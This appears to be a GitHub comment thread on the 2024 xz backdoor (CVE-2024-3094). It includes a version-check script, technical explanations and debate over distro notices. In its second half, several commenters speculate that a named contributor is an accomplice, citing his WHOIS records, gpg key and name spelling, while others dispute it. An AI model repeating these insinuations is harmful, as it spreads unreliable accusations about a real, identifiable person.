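    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *)           return 1 ;;
    esac
}

# Print the version reported by the xz on PATH, or nothing if xz is missing.
# Assumes the first line of `xz --version` ends with the version number.
installed_xz_version() {
    command -v xz >/dev/null 2>&1 || return 0
    xz --version | awk 'NR == 1 { print $NF }'
}

version=$(installed_xz_version)
if [ -z "$version" ]; then
    echo "xz not found on PATH"
elif is_backdoored_release "$version"; then
    echo "xz $version: version number matches a backdoored release"
else
    echo "xz $version: version number is not 5.6.0 or 5.6.1"
fi
```

A match here is a reason to follow your distro's advisory, not a diagnosis; a distro's own notice remains the better source.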

@Osiris-Team

What about xz for Java (https://mvnrepository.com/artifact/org.tukaani/xz), is it safe?

@Artoria2e5

Artoria2e5 commented Apr 2, 2024

@erinacio
Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.

Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

Arch Linux is the opposite: it incorrectly states that it shipped backdoored versions in https://archlinux.org/news/the-xz-package-has-been-backdoored/. Binary diff by Felix Yan shows that only the build id changed between 5.6.1-1 (made from the bad tarball) and 5.6.1-2 (made from git tag).

Maybe @dvzrv can fix this? (I hope this doesn't cause him to subscribe automatically, because this is a high-traffic thread.) There is a clarification that libsystemd is not present, so it could not have affected sshd, but it's not the same level of assurance as "the code is simply not there".


@Osiris-Team XZ for Java is not known to be affected by this backdoor. It's not as easy to hide bad things in pure Java code...

@Gasu16

Gasu16 commented Apr 2, 2024

What about xz for Java (https://mvnrepository.com/artifact/org.tukaani/xz), is it safe?

It's still considered to be safe at the moment. The latest commits were made by the original authors; Jia Tan committed in January 2024, updating the README for bug reports.

https://git.tukaani.org/?p=xz-java.git;a=shortlog;pg=0
https://blog.sonatype.com/cve-2024-3094-the-targeted-backdoor-supply-chain-attack-against-xz-and-liblzma
https://security.apache.org/blog/cve-2024-3094/

@erinacio

erinacio commented Apr 2, 2024

@erinacio
Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.
Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

Arch Linux is the opposite: it incorrectly states that it's affected in https://archlinux.org/news/the-xz-package-has-been-backdoored/. Binary diff by Felix Yan shows that only the build id changed between 5.6.1-1 (made from the bad tarball) and 5.6.1-2 (made from git tag).

Maybe @​dvzrv can fix this? (I hope this doesn't cause him to subscribe automatically, because this is a high-traffic thread.)

Well, I think a false positive is tolerable in such a case, especially given that the last section of the notice indicated that Arch might not be affected because liblzma is not dynamically linked to sshd. At that time we just didn't have enough understanding of the backdoor. It was annoying but won't cause real damage, in contrast to a false negative.

@Artoria2e5

Artoria2e5 commented Apr 2, 2024

@flybyray

The eval [...] could do harm for the generic vanilla kernel builds.

It could, indeed in theory, replace the whole script there with an early exit. It could even, in theory, manage to add a module to the kernel.

It does not though. There is simply no evidence of this attack having anything to do with the kernel.

The kernel's xz decompressor is extremely stripped down. It's been forked off since before JT took over. (This only means the decompressor is likely not backdoored. This would not stop a new version of malicious xz from adding a module.)

ask your self why they used sh as a pipe target and not as others (KBZIP2,LZMA,ZSTD,...) the tool itself. the shell process will populate a lot more background information useful to activate the payload injections.

The answer is right there in xz_wrap.sh, in case $SRCARCH in. Each architecture has its own branch/call/jump filters that help improve compression ratio by (reversibly) turning relative jump addresses into absolute addresses.
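To illustrate the idea, here is a deliberately simplified sketch of such a filter for x86 `call rel32` instructions. It is not the actual xz implementation (which applies extra heuristics and covers more instructions); the function names are made up for this example.

```python
import struct

CALL_OPCODE = 0xE8  # x86 "call rel32": opcode byte followed by a 4-byte offset


def _convert(data: bytes, encode: bool) -> bytes:
    out = bytearray(data)
    i = 0
    while i + 5 <= len(out):
        if out[i] == CALL_OPCODE:
            (value,) = struct.unpack_from("<I", out, i + 1)
            next_insn = i + 5  # relative offsets count from the next instruction
            if encode:
                value = (value + next_insn) & 0xFFFFFFFF  # relative -> absolute
            else:
                value = (value - next_insn) & 0xFFFFFFFF  # absolute -> relative
            struct.pack_into("<I", out, i + 1, value)
            i += 5  # skip the operand so decoding visits the same positions
        else:
            i += 1
    return bytes(out)


def bcj_encode(data: bytes) -> bytes:
    return _convert(data, encode=True)


def bcj_decode(data: bytes) -> bytes:
    return _convert(data, encode=False)
```

Two calls to the same function from different places have different relative offsets but the same absolute address, so after encoding they become identical byte sequences that the compressor can match. Because the opcode bytes are never modified and operands are skipped, decoding walks the same positions and restores the input exactly.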

as this was just committed shortly before the public announcement of this CVE

What is "this"? xz_wrap was recently changed by Lasse, but the changes are reasonable and do not introduce any new eval; the options are consistent with manpage recommendations. The Makefiles were recently changed for version and other reasons, not much to do with xz.

The more pertinent "time pressure" theory is from Solar Designer: https://www.openwall.com/lists/oss-security/2024/03/31/9. It turns out libsystemd decided to load liblzma lazily (dlopen()) in a future version, so if the payload isn't pushed out now, it would stop working soon.

@AdrianBunk

@thesamesam Does anyone have IRC logs, and if yes are they being analyzed?

These should contain hints about timezone, location, mother tongue and cultural background of the attacker.

@christoofar

Please refrain from using this for propaganda and distro-bashing

you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro doesn't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

Debian and its derivatives and RH-distros were the ones affected by it, by using sd_notify and by building the pkgs as they do. You are branding as irresponsible those who were unaffected? Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl? (I don't know whether they actually published a warning or not). You are saying they should dump Alpine and use Ubuntu testing or Fedora or RHell?

Easy there!

Unless someone is not telling us ALL the true and entire story if it wasn't for systemd deb and rpm there would have been nothing to talk about here, would there be?

There's not one specific point in the chain that's a concern, there's like 10+ of them. And what's really disappointing to see is the rush to moan about focus of any particular part of the chain and squash any enthusiasm to rethink any part of it.

@dguerri

dguerri commented Apr 2, 2024

Quick Docker setup based on xzbot, to demonstrate backdoor usage

@przemoc

przemoc commented Apr 2, 2024

My attempt at collecting and organizing links related to xz backdoor (2024) aka CVE-2024-3094.

https://przemoc.github.io/xz-backdoor-links/
or
https://github.com/przemoc/xz-backdoor-links/blob/main/index.mm.md

Nothing new there (sorry for that), but for those who are late to the news (I guess that's less and less possible every minute) it may slightly help in navigating the various resources related to this topic.

@fungilife

@thesamesam Does anyone have IRC logs, and if yes are they being analyzed?
These should contain hints about timezone, location, mother tongue and cultural background of the attacker.

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

Despite what I read here and in the openwall discussions, a slight doubt remains in my head. If systemd were portable to musl and packages were built as in Debian/RH, would the same mechanism be effective, or does musl make a difference elsewhere, as in the compiling and linking process of xz/lzma? Otherwise it seems that if sd_notify doesn't trigger a process, the rest is just dirt sitting beside library items, not replacing or modifying anything else.

By the way, Arch had built two versions that were infected, 5.6.0-1 and 5.6.1-1. 5.6.1-2 was built from git, not the tarball, with the distro's native tools, and 5.6.1-3 was built from git.tukaani.org. Those are the discovered infected tarballs, but the same entity has signed tarballs further back retroactively.

@redcode

redcode commented Apr 2, 2024

@thesamesam Does anyone have IRC logs, and if yes are they being analyzed?
These should contain hints about timezone, location, mother tongue and cultural background of the attacker.

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

Who are you to decide what the object should be here or how to narrow down what people want to investigate? Let Sam ask for whatever he wants, besides, the gist is his and he's doing a good job.

You are nobody's boss, so don't be impertinent.

@marco-silva0000

How hard is it to be objective and civil these days?
This is the logging policy, https://libera.chat/policies/#public-logging
Also, I haven't seen any logs shared anywhere.
I think there's value in that type of analysis, but ultimately it can be considered out of scope for this gist by its creator.

@orbea

orbea commented Apr 2, 2024

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

The state agencies may be involved in this themselves and knowing who organized this attack may shed light on what kind of payload was going to be used or who the intended targets were. I don't think it is wise to prematurely shut down any relevant avenue of investigation.

@wibeipummedo

wibeipummedo commented Apr 2, 2024

Saw an interesting commit over in cpython: python/cpython@ea51476

It's part of PR python/cpython#115989

The bytecode there seems to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53)
b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c)
c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91)
d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent build failing' - different scenario, and it kind of makes sense, but it reminds me of the apparent reasoning for 'fixing' the valgrind issue. (https://github.com/python/cpython/pull/115989/files#r1505355565)

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for a different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even by accident. EDIT: as said below by AdrianBunk and others, it probably is just bad timing after all. NM

@DiagonalArg

DiagonalArg commented Apr 3, 2024

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

The state agencies may be involved in this themselves and knowing who organized this attack may shed light on what kind of payload was going to be used or who the intended targets were. I don't think it is wise to prematurely shut down any relevant avenue of investigation.

Agreed. Also, discussing who, is necessary to work out the team or network of sockpuppets that may be involved. That may help identify other PR's that may be prongs of the attack, or other, as yet unidentified, attacks.

@christoofar

cpython is just a binding project... all you should care about is Is The Binding Alive??? you would normally just compress and decompress some test string and call it a day.

There was ZERO reason to bring all that shit into the cpython repo. If you are so worried about the RISCV variant you would, as a client of the downstream lib, just testbed that.

This is not a coinkidink.

@christoofar

Saw an interesting commit over in cpython: python/cpython@ea51476

It's part of PR python/cpython#115989

The bytecode there seems to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53) b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c) c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91) d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creates more targets.

This is a significant find.

@redcode

redcode commented Apr 3, 2024

Saw an interesting commit over in cpython: python/cpython@ea51476

It's part of PR python/cpython#115989

The bytecode there seems to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53) b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c) c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91) d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

This guy claimed to be "an engineer from Bouffalo Lab", and his GitHub account was registered in 2015, 1 year before Bouffalo was founded (2016). Bouffalo Lab has products that use RISC-V cores, for example this one.

Looking at his commits, I see that sometimes he uses an email with domain bouffalolab.com, and other times, when he merges PRs, etc, another one with his personal domain. A priori he does not look like a spy/hacker.

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creates more targets.

This is a significant find.

Interesting... maybe he was being manipulated by Jia Tan?

His website consists of a blog with a single post about liblzma written this year (March 9th).

@AdrianBunk

cpython is just a binding project...

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creates more targets.

It might be better for @christoofar to stop commenting here since he is only making a fool out of himself.

The tinkerboard community is a rather small part of the Linux community, without any real influence on anything.
And "cpython is just a binding project" is, well, the same as saying "I don't have the slightest clue what I am talking about".

@thesamesam
Author

thesamesam commented Apr 3, 2024

@AdrianBunk I have IRC logs but I don't want to post them publicly because it feels wrong. In part because it is affecting other members of the community.

I will share with any official bodies who request it, also Lasse who has his own, but wants to be able to verify them against mine. Also open to any other reasonable requests. I just don't want to dump them en-masse either.

I appreciate this might be a bit controversial but I don't want to throw out every norm we have in FOSS either.

@thesamesam
Author

@JohnVeness Thank you, fixing!

@lhmouse

lhmouse commented Apr 3, 2024

The name 'Chien Wong' is a bit suspicious, as this person claims to live in Nanjing, but neither word is Mandarin, and confuses native speakers. We do not know how to pronounce 'Chien'. It's like this person is from HK or TW. My advice is to write to Bouffalo Lab for confirmation.

@duanqn

duanqn commented Apr 3, 2024

The name 'Chien Wong' is a bit suspicious, as this person claims to live in Nanjing, but neither word is Mandarin, and confuses native speakers. We do not know how to pronounce 'Chien'. It's like this person is from HK or TW. My advice is to write to Bouffalo Lab for confirmation.

It is unusual but I don't think the name spelling itself is enough to call him/her 'suspicious'.

@christoofar

The name 'Chien Wong' is a bit suspicious, as this person claims to live in Nanjing, but neither word is Mandarin, and confuses native speakers. We do not know how to pronounce 'Chien'. It's like this person is from HK or TW. My advice is to write to Bouffalo Lab for confirmation.

I'm going to go with the theory that this is Jia Team Partner 2. I think this removes all doubt.

ivq/homepage@696470a#diff-36b91ec80ca75f577eb44c59060b08c14c8a7dda2f9bebabe65f31278d4e7a65

@thesamesam

@AdrianBunk

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

@wibeipummedo

"Person was perhaps just excited" is likely "Person is paid to improve RISC-V support".

As @redcode already mentioned, this is a person who has been active on GitHub for a decade, which looks quite different from the identities of the attacker.

The test files in this test were just used in a small testcase to compare whether the output is as expected.

The exploit is that liblzma was used to add a backdoor to one specific program (sshd), none of that could have added a backdoor to Python by accident.

Python upstream seems happy with the general change and not suspicious even after the xz exploit is known.

There is nothing that strikes me about this person as being part of the attack, "poor timing" would be my first impression.

@christoofar

christoofar commented Apr 3, 2024

cpython is just a binding project...

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creates more targets.

It might be better for @christoofar to stop commenting here since he is only making a fool out of himself.

The tinkerboard community is a rather small part of the Linux community, without any real influence on anything. And "cpython is just a binding project" is, well, the same as saying "I don't have the slightest clue what I am talking about".

I use CPython a lot. I know what's going on here.

The enhancement Jia made is for RISCV. Who, using CPython, is going to get excited about that feature? Use your brain.

@christoofar

There is nothing that strikes me about this person as being part of the attack, "poor timing" would be my first impression.

Whatever you say, Jia.

@AdrianBunk

@thesamesam Yes, that's what I meant with "being analyzed". People at law enforcement who are doing that professionally.

@wibeipummedo

@AdrianBunk

The test files in this test were just used in a small testcase to compare whether the output is as expected.

Fair enough. I was worried as I noticed they were the new ones in 5.6.1 that Jia Tan had added. I wondered what they might do when decompressed, if they were like the other ones in the infographic https://infosec.exchange/@fr0gger/112189232773640259

The exploit is that liblzma was used to add a backdoor to one specific program (sshd), none of that could have added a backdoor to Python by accident.

Yeah. I was reading about the 'extension' feature in the malicious code and wondered if this was part of some other vector, maybe affecting cpython at build time for some future exploit. But probably (hopefully) not. Just 'jumping at shadows' now :)

There is nothing that strikes me about this person as being part of the attack, "poor timing" would be my first impression.

Yeah, I hope you're right! Thanks.

@christoofar

Saw an interesting commit over in cpython: python/cpython@ea51476

It's part of PR python/cpython#115989

The bytecode there seems to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53) b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c) c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91) d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

Our little friend is on GitLab and he asked for filter enhancements to Wireshark. Still has two MRs out there waiting to push in.
https://gitlab.com/wireshark/wireshark/-/merge_requests?scope=all&state=merged&author_username=ivq

@thesamesam we have a winner

@gonoph

gonoph commented Apr 3, 2024

The name 'Chien Wong' is a bit suspicious

Chien Wong - I looked at his github:

  • Created in 2015
  • bunch of activity in the last year 2023+
  • 2020, started putting in some activity into other repos
  • "lessons learned from lzma" post was created 3 weeks ago
  • created his homepage on github pages 4 months ago

The only anomaly is: GitHub says his profile is in Nanjing, China, with a TZ of GMT+08, but:

  • created the current home page on Christmas Eve (Dec 24th, 2023)
  • then updated his 404 page for New Years (Jan 1st, 2024)

However, not a smoking gun of anything at this point.

In fact, if you use the Internet Archive (TW:language) to view his past incarnations, you can see it was hosted since 2015 as well. Interestingly enough, on the 2017 copy of the website, his name is Ch'ien Wang instead of Chien Wong. I'm not familiar enough with Chinese names to know if that is odd or not.

This profile looks organic. My own github activity history has a similar pattern. I'm also bad about keeping my homepage up to date.

He also committed several changes to Wireshark in 2022 and 2023. They look like several commits for Wireshark's Wi-Fi 802.11 handling: to meet the spec more accurately, to add a new capability to it for IPv6, and to fix a bug. I'm not an 802.11 expert, but the code doesn't look unsafe at a cursory glance for the most part.

There's some rework in this commit to address A-MSDU dissecting that is addressing the padding for the last packet. This seems plausible to me, but again, I don't know enough about 802.11.

          /* The last A-MSDU subframe has no padding. */
          if (last_subframe)
            subframe_length = 14+msdu_length;
          else
            subframe_length = WS_ROUNDUP_4(14+msdu_length);
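For readers unfamiliar with the arithmetic, the same length calculation can be sketched in Python. This is only a restatement of the snippet above, assuming (as its name suggests) that `WS_ROUNDUP_4` rounds up to the next multiple of four; the 14 bytes are the A-MSDU subframe header (6-byte destination address, 6-byte source address, 2-byte length). The function names are hypothetical.

```python
SUBFRAME_HEADER_LEN = 14  # destination (6) + source (6) + length field (2)


def round_up_4(n: int) -> int:
    """Round n up to the next multiple of 4 (assumed behaviour of WS_ROUNDUP_4)."""
    return (n + 3) & ~3


def subframe_length(msdu_length: int, last_subframe: bool) -> int:
    """Bytes occupied by one A-MSDU subframe, including padding if any."""
    raw = SUBFRAME_HEADER_LEN + msdu_length
    # Every subframe except the last is padded to a 4-byte boundary.
    return raw if last_subframe else round_up_4(raw)
```

For a 100-byte MSDU this gives 116 bytes for an intermediate subframe and 114 bytes for the last one, which is the two-byte difference the commit accounts for.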

The only odd thing is his gpg key, which has a ridiculous 10 year expiration time. That could be the tool he used.

$ gpg --keyserver keyserver.ubuntu.com --recv-key 5CA58A39FA4122AD
$ gpg --list-sig 5CA58A39FA4122AD
pub   ed25519 2022-06-21 [SC] [expires: 2032-06-18]
      615887C24F853CE9191F944E5CA58A39FA4122AD
uid           [ unknown] Chien Wong <m@xv97.com>
sig 3        5CA58A39FA4122AD 2022-06-21  Chien Wong <m@xv97.com>
sub   cv25519 2022-06-21 [E] [expires: 2032-06-18]
sig          5CA58A39FA4122AD 2022-06-21  Chien Wong <m@xv97.com>

@x1done

x1done commented Apr 3, 2024

Registrant Country of the domain very likely changed to CN on 2023-06-05T11:01:50Z

Domain Name: XV97.COM
Registry Domain ID: 1965709820_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2023-06-05T11:01:50Z
Creation Date: 2015-10-03T12:33:29Z

Registrar Registration Expiration Date: 2024-10-03T12:33:29Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: Jiangsu
Registrant Postal Code: DATA REDACTED
Registrant Country: CN
Registrant Phone: DATA REDACTED

Domain Name: XV97.COM
Registry Domain ID: 1965709820_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2022-09-08T08:08:33Z
Creation Date: 2015-10-03T12:33:29Z

Registrar Registration Expiration Date: 2023-10-03T12:33:29Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: None
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED

Domain Name: XV97.COM
Registry Domain ID: 1965709820_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2020-05-26T08:11:21Z
Creation Date: 2015-10-03T12:33:29Z

Registrar Registration Expiration Date: 2021-10-03T12:33:29Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: None
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: DATA REDACTED
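To make the change between the records easier to see, here is a small sketch that parses `Key: Value` WHOIS text and lists the fields that differ. The helper names are hypothetical, and the sample strings are short excerpts of the 2022 and 2023 records above, not complete records.

```python
def parse_whois(text: str) -> dict[str, str]:
    """Parse 'Key: Value' lines into a dict; lines without a key are ignored."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")  # split on the first colon only
        if sep and key.strip():
            fields[key.strip()] = value.strip()
    return fields


def changed_fields(older: dict[str, str], newer: dict[str, str]) -> dict:
    """Map each differing key to its (older, newer) values."""
    keys = sorted(set(older) | set(newer))
    return {k: (older.get(k), newer.get(k))
            for k in keys if older.get(k) != newer.get(k)}


record_2022 = parse_whois(
    "Updated Date: 2022-09-08T08:08:33Z\n"
    "Registrant State/Province: None\n"
    "Registrant Country: US\n"
)
record_2023 = parse_whois(
    "Updated Date: 2023-06-05T11:01:50Z\n"
    "Registrant State/Province: Jiangsu\n"
    "Registrant Country: CN\n"
)
for field, (old, new) in changed_fields(record_2022, record_2023).items():
    print(f"{field}: {old} -> {new}")
```

Note that this only shows what the published records say; with redacted WHOIS data, a changed country field may reflect an updated contact entry rather than a move.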

@zacanger

zacanger commented Apr 3, 2024

@gonoph

his name is Ch'ien Wang instead of Chien Wong. I'm not familiar enough with Chinese names to know if that is odd or not.

The interesting bit is that it's mixing romanizations. Ch'ien is Wade-Giles, Chien is simplified Wade, and Qian (implied by his work email, qwang) would be pinyin. Wong and Wang are also likely the same name, depending on location. Could definitely be an immigrant to the mainland from Taiwan or overseas, or just changing it based on stylistic preference.

@lhmouse

We do not know how to pronounce 'Chien'.

Qián

@RufusExE

RufusExE commented Apr 3, 2024

In my personal opinion, based on the current evidence of long-term lurking and preparation, it can be inferred that this individual has motives and plans, thinks clearly and cautiously, and the information related to their background and daily routine may be distorted or manipulated. Any records left behind could potentially be intentional.

@lhmouse

lhmouse commented Apr 3, 2024

@zacanger

Wong and Wang are also likely the same name,

As far as I know, no transliteration scheme for Mandarin ever confuses 'Wong' with 'Wang':
(https://resources.allsetlearning.com/chinese/)

Sample IPA Pinyin Wade-Giles
王 [u̯ɑŋ] Wang Wang
翁 [u̯əŋ] Weng Weng
雍 [i̯ʊŋ] Yong Yung
锺/钟 [tʂʊŋ] Zhong Chung

@orangepizza

Could the logs from git.tukaani.org give us more detail about the commits, such as which IP they came from, or the difference between merge time and commit time?
I think GitHub surely has this, but I'm not sure about Lasse's logs, since some of them would already be a few years old.

@rdebath

rdebath commented Apr 3, 2024

The only odd thing is his gpg key, which has a ridiculous 10 year expiration time.

That is 3650 days, exactly the sort of period that would be chosen by someone who believes they have to choose a period but doesn't want to be bothered by it. In fact I'm not even sure which way (too long or too short) you believe it is "ridiculous", as it has been used a lot as a popular replacement for "never expires". I would assume "too long", due to the insecurity and value assumptions about websites of the CAB.
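The 3650-day figure can be checked against the dates in the gpg listing quoted earlier (created 2022-06-21, expires 2032-06-18) with a few lines of date arithmetic:

```python
from datetime import date, timedelta

created = date(2022, 6, 21)  # creation date from the gpg listing
expires = created + timedelta(days=3650)
print(expires)  # 2032-06-18, matching the listed expiry

# Ten calendar years would end three days later, because the span
# contains three leap days (2024, 2028 and 2032).
ten_calendar_years = date(2032, 6, 21)
print((ten_calendar_years - created).days)  # 3653
```

So the expiry is consistent with a validity period entered as a round number of days rather than as a calendar date.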

@daniel-dona

Saw an interesting commit over in cpython: python/cpython@ea51476
It's part of PR python/cpython#115989
The bytecode there seems to be .xz test files from the 5.6.1 release.
Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)
I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:
a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53) b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c) c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91) d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)
Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

Our little friend is on GitLab and he asked for filter enhancements to Wireshark. Still has two MRs out there waiting to push in. https://gitlab.com/wireshark/wireshark/-/merge_requests?scope=all&state=merged&author_username=ivq

@thesamesam we have a winner

What's the problem with the Gitlab MRs?

@xry111

xry111 commented Apr 3, 2024

@zacanger

Wong and Wang are also likely the same name,

As far as I know, no transliteration scheme for Mandarin ever confuses 'Wong' with 'Wang': (https://resources.allsetlearning.com/chinese/)

Sample IPA Pinyin Wade-Giles
王 [u̯ɑŋ] Wang Wang
翁 [u̯əŋ] Weng Weng
雍 [i̯ʊŋ] Yong Yung
锺/钟 [tʂʊŋ] Zhong Chung

https://en.wikipedia.org/wiki/Wong_(surname)

@Z-nonymous

I think this removes all doubt.

ivq/homepage@696470a#diff-36b91ec80ca75f577eb44c59060b08c14c8a7dda2f9bebabe65f31278d4e7a65

Thanks @christoofar, that's a great find.

Especially that posts/c-api-design-learned-from-lzma/index.html file.
